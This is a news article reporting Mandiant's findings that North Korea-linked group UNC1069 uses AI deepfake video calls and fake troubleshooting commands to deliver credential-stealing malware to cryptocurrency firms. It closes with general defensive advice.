Synopsis: Google Cloud warns of North Korea-linked hackers using AI deepfakes and seven malware types to target crypto firms. Fake video calls trick victims into installing theft tools.
Cybercriminals with ties to North Korea are launching sophisticated attacks against cryptocurrency companies. These threat actors are using artificial intelligence to make their schemes more convincing. The attacks combine fake video calls and malicious software to steal digital assets.
Google Cloud’s security team has identified a major escalation in these criminal operations. The attackers target cryptocurrency firms, fintech companies, and blockchain developers. Their methods have become more advanced since they started using AI tools.
Hackers Deploy Seven Malware Families in Single Attack
Mandiant researchers uncovered a disturbing trend in recent investigations. A threat group called UNC1069 deployed seven different malware families during one intrusion. This represents a significant expansion of their criminal toolkit.
The malware includes newly discovered viruses named CHROMEPUSH and DEEPBREATH. These programs steal browser data, login credentials, and session tokens. Additionally, they harvest information from messaging apps and password managers.
The attackers also use SILENCELIFT to capture victim data silently. Other tools in their arsenal include SUGARLOADER, WAVESHAPER, and HYPERCALL. Each malware serves a specific purpose in the theft chain.
Mandiant has tracked this North Korean group since 2018. However, their capabilities expanded dramatically in November 2025. That’s when they began incorporating AI-generated content into their attacks.
AI-Powered Deepfakes
The criminals use artificial intelligence to create realistic fake videos. These deepfakes impersonate legitimate cryptocurrency executives and investors. Victims receive meeting invitations through compromised Telegram accounts.
During fake Zoom calls, attackers display AI-generated video feeds. They claim to experience audio or video problems. Then they direct victims to run “troubleshooting commands” on their computers.
These commands contain hidden malicious code. Once executed, they download additional malware onto the victim’s system. The infection happens quickly and quietly.
The social engineering tactics have become remarkably sophisticated. Attackers first build trust by posing as known contacts. They research their targets thoroughly before making contact. Furthermore, the AI-generated videos appear genuine at first glance.
This ClickFix attack method tricks even experienced technology professionals. The commands look like normal technical fixes. Victims don’t realize they’re installing malware until it’s too late.
Also Read: Crypto.com CEO Unveils AI Agents for Crypto Apps & Wallets at Super Bowl LIX
Cryptocurrency Companies Face Mounting Threats
North Korean threat actors primarily target cryptocurrency and blockchain businesses. They also focus on software developers and venture capital firms. The attacks aim to steal digital assets and sensitive financial information.
The malware extracts data from multiple sources on infected systems. It captures browser cookies, saved passwords, and autofill information. Moreover, it steals Telegram session data and Apple Notes content.
Attackers use stolen credentials to access cryptocurrency wallets directly. They also leverage compromised accounts for future social engineering campaigns. This creates a cycle of ongoing criminal activity.
In June 2025, four North Korean operatives infiltrated crypto firms as freelance developers. They stole $900,000 from multiple startups. Earlier that year, the Lazarus Group executed a $1.4 billion hack of Bybit exchange.
These incidents demonstrate the persistent threat North Korean actors pose. They continuously adapt their methods to exploit new vulnerabilities. Consequently, cryptocurrency companies must remain vigilant.
Defenses Against AI-Enhanced Attacks
Security experts recommend several protective measures for cryptocurrency firms. Companies should train employees to recognize suspicious meeting invitations. Staff must never run unsolicited commands from external sources.
Organizations need robust endpoint detection systems. These tools can identify unusual processes and data exfiltration attempts. Regular security audits help identify potential vulnerabilities.
Telegram users should enable all available security features. Multi-factor authentication adds an important layer of protection. Companies should verify contact identities through secondary channels before joining meetings.
The rise of AI-generated deepfakes makes verification more critical. Trust but verify should be every organization’s motto. Simple confirmation calls can prevent devastating breaches.
Mandiant continues monitoring UNC1069’s activities closely. The Google Cloud security team provides updated threat intelligence regularly. Organizations can use this information to strengthen their defenses.
The cryptocurrency industry faces an evolving threat landscape. North Korean actors will likely continue refining their techniques. Therefore, constant vigilance and updated security practices remain essential for protection.
Written By Fazal Ul Vahab C H
